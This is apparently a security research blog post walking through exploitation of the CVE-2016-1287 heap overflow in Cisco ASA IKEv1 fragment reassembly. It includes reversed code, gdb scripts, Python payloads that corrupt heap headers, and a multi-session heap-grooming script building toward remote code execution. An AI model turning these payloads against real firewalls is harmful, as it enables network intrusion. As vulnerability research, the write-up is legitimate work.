Cisco ASA series part eight: Exploiting the CVE-2016-1287 heap overflow over IKEv1

This article is part of a series of blog posts. We recommend that you start at the beginning. Alternatively, scroll to the bottom of this article to navigate through the whole series.

Exodus Intel released how they exploited [1] CVE-2016-1287 for IKEv2 in February 2016, but there wasn't anything public for IKEv1. This blog post documents our approach for exploiting the bug over IKEv1. If not specified otherwise, we target ASA 9.2.4 32-bit (asa924-k8.bin) though we confirmed most concepts work for all ASA 32-bit and 64-bit versions based on dlmalloc-2.8.x. All source code is reversed code and has been simplified in this documentation to contain only relevant parts for discussion.

Getting some knowledge

Logging allocations when a fragment is receiveda

By setting breakpoints on malloc/calloc/free, we log allocations in the IKEv1 thread using the following gdb script. We do this by leveraging the dlchunk command which is part of libdlmalloc [2] and was discussed in a previous blog post. We recommend using asadbg, which integrates all the heap analysis tools we have developed: libdlmalloc, libptmalloc and libmempool.

The thread ID may differ in your case. It needs to be previously known and can be determined by setting a breakpoint in an IKEv1 function and trigger that it hits (e.g. IKE_AddRcvFrag, which is 0x08681ED0 on ASA 9.2.4).

# end of calloc()
b *0x09BEC157 thread 2
commands
silent
printf "calloc -> "
dlchunk $edx-0x28
continue
end

# end of malloc()
b *0x09BEC0EF thread 2
commands
silent
printf "malloc -> "
dlchunk $edx-0x28
continue
end

# free()
b *0x09BEC1F0 thread 2
commands
silent
if (*(int*)($esp+4) == 0)
continue
else
set $addr = *(int*)($esp+4)
printf "free -> "
dlchunk $addr-0x28
end
continue
end

We log what happens when we send three fragments that get reassembled. The interesting parts are detailed below. As you can see, the name of the functions are displayed thanks to libmempool [3] and ret-sync [4], as detailed in previous blog posts.

FUNC?     ADDRESS?     CHUNK SIZE? FLAGS?         WHO ALLOCATED THIS?             WHAT FOR?
// fragment 1
malloc -> 0xacb889d8 M sz:0x00050 fl:CP alloc_pc:ike_receiver_process_data+0x38e // pkt_info
malloc -> 0xacb88dd8 M sz:0x00090 fl:CP alloc_pc:ike_receiver_process_data+0x3ed // packet_ike
malloc -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
calloc -> 0xacb89190 M sz:0x00048 fl:CP alloc_pc:IKE_AddRcvFrag+0x30c // frag queue
malloc -> 0xacb98c00 M sz:0x00038 fl:CP alloc_pc:IKE_AddRcvFrag+0x13c // queue entry1
free -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
// fragment 2
malloc -> 0xacb98c38 M sz:0x00050 fl:CP alloc_pc:ike_receiver_process_data+0x38e // pkt_info
malloc -> 0xacb99408 M sz:0x00090 fl:CP alloc_pc:ike_receiver_process_data+0x3ed // packet_ike
malloc -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
malloc -> 0xacb99498 M sz:0x00038 fl:CP alloc_pc:IKE_AddRcvFrag+0x13c // queue entry1
free -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
// fragment 3
malloc -> 0xacb89e50 M sz:0x00050 fl:CP alloc_pc:ike_receiver_process_data+0x38e // pkt_info
malloc -> 0xacb89ea0 M sz:0x00090 fl:CP alloc_pc:ike_receiver_process_data+0x3ed // packet_ike
malloc -> 0xad424e10 M sz:0x00048 fl:CP alloc_pc:enqueue_ike_ext_action+0x17
malloc -> 0xacb88870 M sz:0x00038 fl:CP alloc_pc:IKE_AddRcvFrag+0x13c // queue entry1
malloc -> 0xacb985d8 M sz:0x00100 fl:CP alloc_pc:IKE_GetAssembledPkt+0x53 // reass packet

Importantly, there is an allocation for each IKE packet we receive at 0x086887bd. Then there is an allocation at 0x086821dc when the first fragment is received to create a structure defining the queue. Finally, each time a new fragment is received at 0x0868200c it creates a structure we called entry1, which tracks the raw IKEv1 packet (which we call packet_ike) by keeping a reference to a pkt_info structure. For instance, in the example above 0xacb98c00 is a chunk holding an entry1 structure that points to the raw packet as follows: entry1->pkt_info->packet_ike = 0xacb88dd8.

struct entry1
{
struct entry1* next;
struct pkt_info* pkt_info;
char seq_no;
char unk1;
char unk2;
char unk3;
};

The pkt_info structure is approximately as follows:

struct pkt_info
{
struct packet_ike* packet_ike; // points to IKE raw data
int packet_length; // length of IKE raw packet
int flag;
int field_C;
int field_10;
int field_14;
void* field_18_ptr;
int field_1C;
int field_20;
};

Reversing code that adds fragments to the list and reassembles them

When an IKE packet is received (either IKEv1 or IKEv2), it is handled by the IKE receiver thread. It ends up allocating a buffer to hold the IKE packet before sending it over IPC to the right thread for processing.

void ike_receiver_process_data(struct ike_msg * msg)
{
//...
struct pkt_info* pkt_info = (struct pkt_info*)malloc(sizeof(struct pkt_info));
pkt_info->packet_length = pkt_len;
pkt_info->dst_ip = dst_ip;
//...

// For IKEv1 this is where the allocation for the packet happens
// and this packet is stored later in the fragments list
pkt_info->packet_ike = malloc(msg->len);
memcpy(pkt_info->packet_ike, msg->data, msg->len);
FREEB(msg);
// ...
}

After some validation, the ikev1_parse_packet function is called. It checks if the embedded payload is a Cisco fragment and calls two functions if that is the case: IKE_AddRcvFrag and IKE_GetAssembledPkt.

void ikev1_parse_packet(struct pkt_info** p_pkt_info, struct ike_hdr_ext *ike_hdr_ext, struct ikev1_sa* ikev1_sa)
{
//...
struct packet_ike *packet_ike = (*p_pkt_info)->packet_ike;
if (packet_ike->h.next_payload == CISCO_FRAG) {
IKE_AddRcvFrag(ikev1_sa, *p_pkt_info);
pkt_buffer = IKE_GetAssembledPkt(ikev1_sa);
struct packet_ike* reassembled_pkt = pkt_buffer->data;
//...
} else {
//any other kind of payload
}

IKE_AddRcvFrag is responsible for adding a fragment to the queue. If there is no queue, one is created and initialised. Then it checks if the fragment ID is the same as previously. If the fragment ID is less than the one we are currently handling, the packet is ignored as it is from a previous fragmentation set. If the fragment ID is more than the one we are currently handling, the previous set of fragments is deprecated and freed. If the fragment being parsed has the lastfrag flag set, then that seqno will be recorded to indicate the number of fragments needed.

Finally, the reassembly length is updated to take into account the new fragment. This is where the CVE-2016-1287 integer underflow vulnerability is since it subtracts 8, which corresponds to the discarded Cisco fragmentation payload header. Note there is a check on the current reassembly length as it cannot be more than 32k bytes (0x8000).

int IKE_AddRcvFrag(struct ikev1_sa*ikev1_sa, struct pkt_info *pkt_info)
{
DWORD res = 0;
struct packet_ike* packet_ike = pkt_info->packet_ike;
struct fragment_payload* fragment_payload = (struct fragment_payload*)&packet_ike->data;

// Have we got a fragments queue already?
if (!ikev1_sa->frag_queue1) {
// allocates and initializes the fragment queue
ikev1_sa->frag_queue1 = calloc(1, 0x14);
ll_init(ikev1_sa->frag_queue1, IKE_FragCompare);
}

// Check fragment ID
if (ikev1_sa->fragment_id == fragment_payload->id) {
//same id as previously
//...
}
else if (fragment_payload->id < previous_id) {
es_PostEvent("belongs to previous fragmentation set");
goto b_end;
}
else {
// new fragment id
// this also resets ikev1_sa->frag_queue1->assembled_len
// and ikev1_sa->frag_queue1->lastfrag_seqno
IKE_FreeAllFrags(ikev1_sa, 0, 0);
ikev1_sa->fragment_id = fragment_payload->id;
es_PostEvent(...);
}

// Is it the last fragment?
if (fragment_payload->last_frag & 0x1) {
ikev1_sa->frag_queue1->lastfrag_seqno = fragment_payload->seq_no;
}

// Update reassembly length
// This is where the underflow happens
int ikev1_sa->frag_queue1->assembled_len = ikev1_sa->frag_queue1->assembled_len + \
fragment_payload->payload_length - 8;
if (ikev1_sa->frag_queue1->assembled_len > 0x8000) {
es_PostEvent("assembled pkt size too large");
IKE_FreeAllFrags();
goto b_end;
}

// add fragment to the list
struct entry1* entry1 = malloc(0xC);
entry1->seq_no = fragment_payload->seq_no;
entry1->pkt_info = pkt_info;
ll_add(ikev1_sa->frag_queue1, entry1);

b_end:
return res;
}

The important bit here (compared to IKEv2) is that the pkt_info reference is saved and no new fragment structure is ever allocated. The new entry is added to the linked list.

int ll_add(struct frag_queue1 *frag_queue1, struct entry1 *entry1)
{
entry1->next = frag_queue1->entry1;
frag_queue1->frag_count += 1;
frag_queue1->entry1 = entry1;
return 1;
}

The IKE_GetAssembledPkt function is responsible for checking if all the fragments have been received and to reassemble them walking the fragment list and copying them into a newly allocated buffer.

The function decides it has received all fragments if the lastfrag was set on a seqno with a value equal to the number of received fragments. Then it allocates a buffer for the reassemble packet, based on the assembled_len field being accumulated as each fragment was previously received (as in IKE_AddRcvFrag). Note the allocation size is taking into account +0x14 corresponding to the length of the pkt_buffer structure. Finally, it loops over all queued fragments to copy them in the newly allocated buffer. Here it is important to note that the loop starts looking for fragments starting with a seqno of 1, so if we had sent a seqno=0, it would be skipped from the copy. The other interesting aspect is that if a seqno is missing, ll_find will fail to find it and the loop will exit after freeing the reassembled packet. This is useful because we would like to avoid a case where we copy a ‘negative length’ fragment, as it could result in a large uncontrolled copy (aka a wild copy). For example, if we had sent a fragment with a payload_length of 1, due to the integer underflow, the computed length would be -7, which would result in a wild copy when passed as the length argument to memcpy().

int IKE_GetAssembledPkt(struct ikev1_sa*ikev1_sa)
{
// do not reassemble before the number of fragments equals saved supposed last frag
if (!ikev1_sa || !ikev1_sa->frag_queue1
|| !ikev1_sa->frag_queue1->lastfrag_seqno
|| (ikev1_sa->frag_queue1->lastfrag_seqno != ikev1_sa->frag_queue1->frag_count)) {
goto b_no_reassembly;

}

// allocate reassembled packet
int alloc_size = ikev1_sa->frag_queue1->assembled_len + sizeof(struct pkt_buffer);
struct pkt_buffer* pkt_buffer = malloc(alloc_size);
pkt_buffer->total_size = ikev1_sa->frag_queue1->assembled_len;

int curr_reass_len = 0; //reassembled packet length
int curr_seqno = 1;
struct entry1 cur_entry1;
struct pkt_info* pkt_info;
// loop on all fragments
while (TRUE)
{
cur_entry1.seq_no = curr_seqno;
struct entry1* entry1_found = ll_find(ikev1_sa->frag_queue1, &cur_entry1);
if (!entry1_found) {
free(pkt_buffer);
pkt_buffer = NULL;
goto free_before_end;
}
// update the reassembled packet length
int curr_frag_len = entry1_found->pkt_info->packet_ike->payload_length - 8;
curr_reass_len += curr_frag_len;

// This check is incomplete.
// We are able to corrupt things because it does not take into account
// the sizeof(struct pkt_buffer) (0x14) added to alloc_size
if (alloc_size < curr_reass_len) {
es_PostEvent("Error assmbling fragments! Fragment data longer than packet.");
free(pkt_buffer);
pkt_buffer = NULL;
goto free_before_end;
}
// Process copying one fragment
memcpy(&(pkt_buffer->data + curr_reass_len),
entry1_found->pkt_info->packet_ike->data,
curr_frag_len);
curr_seqno += 1;
// skip all fragments above the one we assume is the last one
if (curr_seqno > ikev1_sa->frag_queue1->lastfrag_seqno)
goto free_before_end; //break successfully
}

b_no_reassembly:
return NULL;
//success:
free_before_end:
IKE_FreeAllFrags(ikev1_sa, NULL, NULL);
end:
return pkt_buffer;
}

What is most important above is that the check for the reassembled length is incomplete as it does not take into account the additional 0x14 bytes. It means we can potentially copy up to 0x14 bytes out of the buffer. We will see later that we can actually overflow up to 0x12 bytes due to some alignment.

Determining bug constraints & how to bypass them

The strategy is quite similar to Exodus Intel's for exploiting IKEv2 [1]. We send four fragments with seqno=0seqno=1seqno=3 and seqno=4.

  • seqno=1 is the only fragment with a positive length (e.g. 0x200 bytes)
  • seqno=0 and seqno=3 have a length of 1 (giving a negative length of -7)
  • seqno=4 has a length of 2 (giving a negative length of -6)

In total the reassembly length will be added with -7-7-6=-20 i.e. a delta of 0x14. However only the seqno=1 fragment will ever be copied into the allocated buffer, as the rest of the sequence numbers is out of the expected order.

What can we overflow?

As detailed in previous blog posts dedicated to libdlmalloc and libmempool, a call to malloc will call wrapper functions that add an extra 0x24 more bytes to the specified length (0x20 bytes for a mp_header and 0x4 bytes for a mp_footer). For instance, this is an allocated chunk:

(gdb) dlchunk 0xacb96a08 -v -x
struct malloc_chunk @ 0xacb96a08 {
prev_foot = 0x8180d4d0
size = 0x1d0 (CINUSE|PINUSE)
struct mp_header @ 0xacb96a10 {
mh_magic = 0xa11c0123
mh_len = 0x1a4
mh_refcount = 0x0
mh_unused = 0x0
mh_fd_link = 0xacb85b30 (OK)
mh_bk_link = 0xa8800604 (-)
allocator_pc = 0x86816b3 (IKE_GetAssembledPkt+0x53)
free_pc = 0x868161d (IKE_FreeAllFrags+0xfd)
0x1a8 bytes of chunk data:
0xacb96a30: 0x394d3943 0x59305239 0x747490ad 0x00163dff
0xacb96a40: 0x08021084 0x01000000 0xd4010000 0xb8010000
0xacb96a50: 0x00011100 0x00000000 0x00000000 0x00000000
...
0xacb96bd0: 0x00000000 0xa11ccdef

And this is a free chunk:

struct malloc_chunk @ 0xacb96bd8 {
prev_foot = 0x8180d4d0
head = 0x30 (PINUSE)
fd = 0xac825ab8
bk = 0xa880005c
struct mp_header @ 0xacb96be8 {
mh_refcount = 0xf3ee0123
mh_unused = 0x0
mh_fd_link = 0x0 (unmapped)
mh_bk_link = 0x0 (unmapped)
allocator_pc = 0x0 (-)
free_pc = 0x0 (-)
0x8 bytes of chunk data:
0xacb96c00: 0x00000000 0xf3eecdef

The following is the positive length fragment (only reassembled) that we send in addition to negative length fragments given a 0x12-byte overhead. It will allocate into a 0x200-byte chunk. We can see we can overflow up to the mh_len field of the next chunk if it is allocated.

n = 0x1dc 
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_foot
buf += struct.pack("<I", 0x203) # dl size
buf += struct.pack("<I", 0xa11c0123) # mh_magic
buf += struct.pack("<H", 0x1d4) # mh_len
buf = "U" * (n - 8 - len(buf)) + buf
sess.send_fragment(seqno=1, fragid=0x100, lastfrag=0, fragdata=buf)

Similarly, the following will allocate into a 0x1d0-byte chunk. We can overflow up to the middle of bk if the following chunk is free.

n = 0x1dc-0x30 
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_foot
buf += struct.pack("<I", 0x31) # dl size
buf += struct.pack("<I", 0x54545454) # dl fd
buf += struct.pack("<H", 0x5353) # dl bk
buf = "U" * (n - 8 - len(buf)) + buf
sess.send_fragment(seqno=1, fragid=0x100, lastfrag=0, fragdata=buf)

Note that above we only show 0x12 bytes of overflow. This is because it turns out the data starts 2 bytes before the end of the pkt_buffer structure so we can really overflow 0x14-2=0x12 bytes.

struct pkt_buffer
{
int field_0;
int field_4;
int field_8;
int field_C;
int16 total_size;
int16 data; //data starts here
};

Bypassing Checkheaps

We discussed Checkheaps in a previous blog post. Checkheaps is a mechanism used to verify heap integrity. It works by calling validate_buffers() every 60 seconds by default. It is heavily based on dlmalloc-2.8.3 used with the DEBUG constant defined. For those that didn't review the earlier post: the way Checkheaps works is by linearly scanning over all chunks starting from the lowest segment address and determining the next chunk by looking at the current chunk size. Depending on if a chunk is free or in use, it does the appropriate checks.

int ch_is_validating = 0;

void validate_buffers(int check_depth)
{
if (ch_is_validating != 0)
return
ch_is_validating = 1;

// loop on all mspaces
while (...)
{
//...
// custom version of dlmalloc function
// note this is inlined...
custom_traverse_and_check(cur_dlmstate, check_depth);
}

finished:
ch_is_validating = 0;
return;
}

The important bit here is if we can set ch_is_validating to a value different from zero, we can prevent validate_buffers() from ever executing again, completely bypassing Checkheaps.

Exploit strategy

To simplify exploitation, for now we will assume Checkheaps is disabled. We effectively disable it with gdb by setting the global ch_is_validating to 1.

(gdb) set *(int*)0x0B2545E0 = 1

We assume the ASA device has been started recently so the heap is not too fragmented. From an attacker scenario, it could be forced by crashing the target if necessary. It is a bad hypothesis for an ideal real scenario, as crashing the target is noisy, but it will help us have a more reliable exploit.

Using the linked list to get a mirror write

The strategy is to target either the dlmalloc-2.8.x free lists unlinking and/or the mempool alloc lists unlinking to be able to write an almost arbitrary value to an almost arbitrary address (aka a ‘mirror write’). We choose the term mirror write because the operation of unlinking an element from a list will allow us to trigger two write operations (one write will typically be useful and the other is an unavoidable side effect). This gives a constraint that both values need to be writable addresses as they will be written to the other address (+ offset).

Below, M is the mspace, P is the chunk to unlink and S is its size.

/* Unlink a chunk from a smallbin */
#define unlink_small_chunk(M, P, S) {
mchunkptr F = P->fd;
mchunkptr B = P->bk;
bindex_t I = small_index(S);
assert(P != B);
assert(P != F);
assert(chunksize(P) == small_index2size(I));
if (F == B)
clear_smallmap(M, I);
else if (RTCHECK((F == smallbin_at(M,I) || ok_address(M, F)) &&
(B == smallbin_at(M,I) || ok_address(M, B)))) {
F->bk = B;
B->fd = F;
}
else {
CORRUPTION_ERROR_ACTION(M);
}
}

Let's say we manage to corrupt the P dlmalloc-2.8.x chunk i.e. we control P->fd and P->bk. This means we control the values of the F and B pointers, which correspond to edx and edi in the assembly below:

.text:09BE530D mov  [edi+0Ch], edx   ; F->bk = B;
.text:09BE5310 mov [edx+8], edi ; B->fd = F;

The two instructions above are the operations of the mirror write and can be leveraged to overwrite two 32-bit values in memory.

Overflowing into adjacent free chunk to target its size (head) field

We saw earlier that we can't overflow before an allocated chunk to target the mempool headers list pointers. Specifically, we can only overflow up to mh_len, meaning we can't control mh_bk_link/mh_fd_link as we are limited by a 0x12-byte overflow. Similarly, we saw that we can't overflow before a free chunk to target freelist pointers. We can only overflow up to the middle of bk so we’re unable to control what could be written where (due to the limitation of the 0x12-byte overflow).

Instead, we use a similar approach to the Exodus Intel IKEv2 exploit [1]. We overflow into an adjacent free chunk to target its size (head) field. This works because 0x12 bytes is enough to overflow the dlmalloc-2.8.x size (head) field of the adjacent chunk. We only need two -7 negative fragments as it will result in a 14-byte delta (0xe) meaning we will overflow 14-2=12 bytes (due to the data being copied two bytes before the end of buffer). Our overrun reassembled packet then gets freed because of a missing fragment (we didn’t send a seqno=2), so it will be coalesced with the adjacent oversized free chunk. The resulting chunk encompasses the adjacent chunk:

n = 0x1dc-0x30-0x6-SIZE_FRAG_HEADER
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_size (prev_foot)
#buf += struct.pack("<I", 0x31) # original dl size (head)
buf += struct.pack("<I", 0x91) # new dl size to encompass the following chunk
buf = "b" * (n - len(buf)) + buf
sess.send_fragment(seqno=1, fragid=0x100, lastfrag=0, fragdata=buf)

Heap feng shui

To be able to reliably overwrite a free chunk and have it encapsulate an adjacent chunk of a specific size, we need to remotely manipulate the heap in order to have a deterministic layout.

Crafting the heap with a deterministic layout scenario one: all from one session

Since we know about all of the allocations that occur when a fragment is received, our idea is to send fragments in two different sessions in order to create holes. We use two sessions and send one fragment in session 1, then one fragment in session 2, then one fragment in session 1, then one fragment in session 2, etc. Then we send one fragment with lastfrag=1 set in session 1 to trigger reassembly. This will free all the session 1 fragments that are not needed anymore since a new packet was reassembled. The reassembled packet will be ignored because it is not valid, but we don't care.

This creates the following layout. M indicates an allocated chunk, F indicates a free chunk (i.e. a hole):

0xa9901a18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2
0xa9901c18 F sz:0x00200 fl:-P free_pc:0x0868161d,IKE_FreeAllFrags+0xfd //session1 - hole
0xa9901e18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2
0xa9902018 F sz:0x00200 fl:-P free_pc:0x0868161d,IKE_FreeAllFrags+0xfd //session1 - hole
0xa9902218 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2

Then we trigger the reassembly of our buffer that will end up being allocated into a hole. Note we choose a length of 0x1d0 for our chunk so it leaves a 0x30-byte free chunk behind. This is exactly the same as Exodus Intel's approach. Below we see how useful libdlmalloc can be for showing us our layout:

0xa9901a18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xa9901c18 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53 //reassembled packet
0xa9901de8 F sz:0x00030 fl:-P free_pc:0x42424242,- //remaining 0x30 hole
0xa9901e18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed
0xa9902018 F sz:0x00200 fl:-P free_pc:0x0868161d,IKE_FreeAllFrags+0xfd //hole
0xa9902218 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed

Corrupting a size (head) field to encompass one adjacent allocated chunk

Using the initial overflow, we decide to change the size of the 0x30-byte free chunk to make it look like a 0x90-byte chunk instead.

n = 0x1dc-0x30-0x6-SIZE_FRAG_HEADER
buf = ''
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic
buf += struct.pack("<I", 0x8180d4d0) # dl prev_size (prev_foot)
#buf += struct.pack("<I", 0x31) # original dl size (head)
buf += struct.pack("<I", 0x91) # new dl size to encompass the following chunk
buf = "E" * (n - len(buf)) + buf

Now, when the 0x1d0-byte chunk is coalesced with the adjacent corrupted 0x90-byte free chunk, it gives a 0x1d0+0x90=0x260 byte free chunk (instead of what would’ve normally been a 0x1d0+0x30=0x200 byte free chunk). We only then have to send another fragment to fill this newly freed 0x260-byte chunk.

We craft the 0x260-byte fragment such that the original 0x30-byte free chunk is replaced with a fake free chunk that has controlled fd/bk pointers. This is done because the 0x200-byte in-use chunk adjacent to the old free chunk can have its dlmalloc-2.8.x header modified to believe it's still adjacent to the fake free chunk. This means when the in-use chunk is freed it will be coalesced with the fake free chunk, giving us a first mirror write.

Additionally, we modify the 0x200-byte adjacent in-use chunk's mempool headers to facilitate yet another mirror overwrite.

For the purpose of testing, we use invalid values for bk/fd and mh_fd_link/mh_bk_link below: 0xffff50500xffff50540xffff5250 and 0xffff5254.

n = 0x260-ALLOC_OVERHEAD_32-SIZE_IKE_HEADER-SIZE_FRAG_HEADER
buf = ''

# 0x1d0 alloc chunk restored (mh_len = 0x1a4)
buf += "F" * (0x1a4-SIZE_IKE_HEADER-SIZE_FRAG_HEADER)
buf += struct.pack("<I", 0xa11ccdef) # mh footer magic

# 0x30 free chunk with corrupted prev/next freelist pointers
buf += struct.pack("<I", 0x8180d4d0) # dl prev_size (not set as prev chunk allocated)
buf += struct.pack("<I", 0x31) # dl size (PINUSE=1)
buf += struct.pack("<I", 0xffff5050) # bk (to get mirror write)
buf += struct.pack("<I", 0xffff5054) # fd (to get mirror write)
buf += struct.pack("<I", 0xf3ee0123) # mh_refcount used as free magic
buf += struct.pack("<I", 0x0) * 6 # ...
buf += struct.pack("<I", 0xf3eecdef) # mh footer magic

# restore 0x200 allocated chunk with corrupted prev/next alloclist pointers
buf += struct.pack("<I", 0x30) # dl prev_size (set as prev chunk freed)
buf += struct.pack("<I", 0x202) # dl size (restored) (CINUSE=1)
buf += struct.pack("<I", 0xa11c0123) # mh_magic
buf += struct.pack("<I", 0x1d4) # mh_len (restored)
buf += struct.pack("<I", 0x0) # mh_refcount (restored)
buf += struct.pack("<I", 0x0) # mh_unused (restored)
buf += struct.pack("<I", 0xffff5250) # mh_fd_link (to get mirror write)
buf += struct.pack("<I", 0xffff5254) # mh_bk_link (to get mirror write)
buf += struct.pack("<I", 0x42414443) # allocator_pc (unused)
buf += struct.pack("<I", 0x42414443) # free_pc (unused)
buf += "G" * (n - len(buf))

Freeing them all (failure due to overwritten pointers)

In order to get our mirror writes, we trigger the reassembly of session 2 in order to free the corrupted chunks. This has the neat side effect of freeing the 0x200 chunk after our reassembled packet. You’ll recall that the layout was the following:

0xa9901c18 M sz:0x001d0 fl:CP alloc_pc:0x086816b3,IKE_GetAssembledPkt+0x53     //reassembled packet
0xa9901de8 F sz:0x00030 fl:-P free_pc:0x42424242,-
0xa9901e18 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed //session2

When the 0x200 chunk at the bottom of the list shown above is freed, the mempool function (mh_mem_free) first unlinks the chunk from the corresponding doubly linked mempool list. This should trigger our first mirror write. Then mspace_free is called and the heap allocator (dlmalloc-2.8.x) should look at adjacent chunks and coalesce with any adjacent free chunks. Since there is a free 0x30-byte chunk before 0x200, it will unlink the 0x30-byte free chunk and coalesce it with the newly free 0x200-byte chunk to give a 0x230–byte chunk, which will be added to the free list. The coalescing of the free chunks should in turn trigger our second mirror write.

Interestingly, however, when we trigger the exploit we get an invalid access while unlinking the free chunk. This means that our corrupted mempool header pointers were not unlinked in the way we expected, as that mempool unlink operation should’ve triggered a SIGSEGV before the coalescing triggered its own SIGSEGV.

Thread 2 received signal SIGSEGV, Segmentation fault.
0x09be530d in ?? ()
(gdb) x /i $pc
=> 0x9be530d: mov DWORD PTR [edi+0xc],edx
(gdb) x /10wx $edi
0xffff5050: Cannot access memory at address 0xffff5050

This can be explained by the fact that we sprayed lots of 0x200-byte chunks in session 2. When we send the last fragment to trigger reassembly and free them all, the unlinking operation happens for all of those fragment chunks. Since they are all of the same 0x200-byte chunk size, they are all on the same mempool list – the corrupted one, as well as others, being part of the feng shui for session 2. Also, they are all part of the linked list of fragments being part of the queue. If other non-corrupted chunks were to be freed first, in the process of being unlinked, it will overwrite our corrupted links mh_fd_link and mh_bk_link fields. Consequently, they will no longer hold the values we provided, but rather, one or more of its links may have been changed and will now point to a different entry on the linked list. This prevents our mirror write from working as intended.

To conclude, this approach won’t work as is, and we need a different heap layout where we can arbitrarily free only a single 0x200-byte chunk so our mh_fd_link and mh_bk_link pointers are not overwritten from other fragment chunks end up being freed first.

Crafting the heap with a deterministic layout scenario two: using different sessions

Next we use a feng shui approach using three sessions:

sess1 = ike_session(host, port)
sess2 = ike_session(host, port)
sess3 = ike_session(host, port)
seq = 1

print("Filling holes")
while seq < seq_count/2:
sess1.send_fragment(seqno=seq, fragid=sess_id1, lastfrag=0, fragdata="A"*sz)
seq += 1

print("Creating 2 adjacent chunks")
sess2.send_fragment(seqno=1, fragid=sess_id2, lastfrag=0, fragdata="B"*sz)
sess3.send_fragment(seqno=1, fragid=sess_id3, lastfrag=0, fragdata=fragdata)

print("Filling after 2 adjacent chunks")
while seq < seq_count:
sess1.send_fragment(seqno=seq, fragid=sess_id1, lastfrag=0, fragdata="A"*sz)
seq += 1

print("Creating one hole")
# reassemble hole session to force hole creation
sess2.send_fragment(seqno=2, fragid=sess_id2, lastfrag=1, fragdata="B"*sz)
return (sess3, sess_id3, sz)

This feng shui approach creates one hole adjacent (before) to one specific fragment, and this adjacent fragment is from a session created only for this single fragment (session 3). The idea is that we can free this specific fragment from session 3 at any time without having other fragments being freed in the process. This lets us avoid having our crafted mh_fd_link/mh_bk_link values overwritten with unwanted values.

# 0xa8c3c4d8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed   // session1
# 0xa8c3c6d8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session1
# 0xa8c3c8d8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session1
# 0xa8c3cad8 F sz:0x00200 fl:-P free_pc:0x42424242,- // session2
# 0xa8c3ccd8 M sz:0x00200 fl:C- alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session3
# 0xa8c3ced8 M sz:0x00200 fl:CP alloc_pc:0x086887bd,ike_receiver_process_data+0x3ed // session1

Now we can trigger reassembly to allocate a 0x1d0-byte chunk inside the 0x200-byte hole, leaving a 0x30-byte free chunk adjacent (after) to it. Using the same method as described in scenario one, we modify the head member to make it appear as a 0x90-byte free chunk. Now we free that single fragment from session 3 to trigger our mirror writes.

sess3.send_fragment(seqno=2, fragid=sess_id3, lastfrag=1, fragdata="C"*sz)

This time we can get our allocated list mirror write to trigger to cause the expected SIGSEGV before the free list one we saw last time:

(gdb) x /i $pc
=> 0x9be7ab3: mov DWORD PTR [ecx+0x10],eax
(gdb) i r ecx
ecx 0xffff5254 -44460
(gdb) i r eax
eax 0xffff5250 -44464

We can then see if we achieved both mirror writes by choosing two writable addresses in memory and checking if we corrupted them after the chunk from session 3 is freed.

If we need several mirror writes, we can effectively generalise this method and create as many sessions with one fragment as we want, limited by the number of sessions we can create [5] and the predictability of a more complicated layout.

From mirror writes to remote code execution

On IKEv2, Exodus Intel targeted a global list_add() function pointer used for adding entries to a linked list, which is what is used on IKEv2 to add new fragments to the fragment queue. It is used as soon as a fragment is received, so they could achieve remote code execution (RCE) by sending a new fragment with the final payload. However, there is no such equivalent in IKEv1, as a dedicated linked list is not used to hold fragment copies.

Looking for another interesting function pointer

We looked for a function pointer to overwrite by targeting IKEv1-related functions. The function intended to be called should be accessing some packet data we can control when sending an IKEv1 packet.

A good candidate we found is IKEMM_BuildMainModeMsg2. By setting a breakpoint on this function and sending a Security Association (SA) initialization packet (the first packet in an IKE session), we could see that at execution time the edx register holds a pointer to a pointer to our IKE packet. Arbitrary data we control in the packet (such as shellcode) is located at index 0x6a from the beginning of the buffer (at 0xadc176da below). In front of the buffer there are bytes we don't control (initialised to 0x0 below), followed by the size of the packet (0x0410) and then the beginning of the raw IKE packet (at 0xadc17682).

(gdb) i r edx
edx 0xacaa8334 -1398111436
(gdb) x /wx 0xacaa8334
0xacaa8334: 0xadc17670
(gdb) x /150bx 0xadc17670
0xadc17670: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xadc17678: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xadc17680: 0x04 0x10 0xeb 0x56 0x34 0x41 0x41 0x56
0xadc17688: 0x42 0x32 0x00 0x00 0x00 0x00 0x00 0x00
0xadc17690: 0x00 0x00 0x01 0x10 0x02 0x00 0x00 0x00
0xadc17698: 0x00 0x00 0x00 0x00 0x10 0x04 0x00 0x00
0xadc176a0: 0x00 0x38 0x00 0x00 0x00 0x01 0x00 0x00
0xadc176a8: 0x00 0x01 0x00 0x00 0x00 0x2c 0x01 0x01
0xadc176b0: 0x00 0x01 0x03 0x00 0x00 0x24 0x01 0x01
0xadc176b8: 0x00 0x00 0x80 0x01 0x00 0x05 0x80 0x02
